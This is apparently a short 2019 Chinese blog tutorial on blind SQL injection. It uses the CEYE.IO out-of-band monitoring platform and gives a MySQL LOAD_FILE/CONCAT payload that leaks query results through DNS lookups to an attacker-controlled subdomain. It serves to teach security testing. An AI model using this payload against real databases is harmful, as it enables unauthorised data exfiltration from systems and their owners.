2019-03-29关于sql注入的无回显注入

在学习完sql注入后才得知现在的注入手法都已过时，但是看了一篇大佬博客后，又得知了一种新的注入手法。
比如现在的网站上都是显示位的，所以大多数的注入手法都是不能用的。所以今天就介绍一下无回显注入

我们需要一个平台ceye的帮助

注：CEYE是一个用来检测带外（Out-of-Band）流量的监控平台，如DNS查询和HTTP请求。它可以帮助安全研究人员在测试漏洞时收集信息（例如SSRF / XXE / RFI / RCE）。

登录 CEYE.IO，在用户详情页(http://ceye.io/profile)可以看到自己的域名标识符 identifier，对于每个用户，都有唯一的域名标识符如 abcdef.ceye.io 。所有来自于 abcdef.ceye.io 或 *.abcdef.ceye.io 的 DNS查询和HTTP请求都会被记录。通过查看这些记录信息，安全研究人员可以确认并改进自己的漏洞研究方案。

通过DNS带外信道检测 Blind Payload 的执行情况

DNS查询可以以多种不同的方式进行解析。CEYE.IO平台提供了一台DNS Server来解析域名。它的 nameserver address 被设置为自己的服务器IP，因此所有关于ceye.io 的域名的DNS查询最终都会被发送到CEYE的DNS服务器

有关代码：

SELECT LOAD_FILE(CONCAT('\\\\',(payloads),'.XXX.ceye.io\\abc'));

当提交之后查询结果会出现在Records中的DNS query里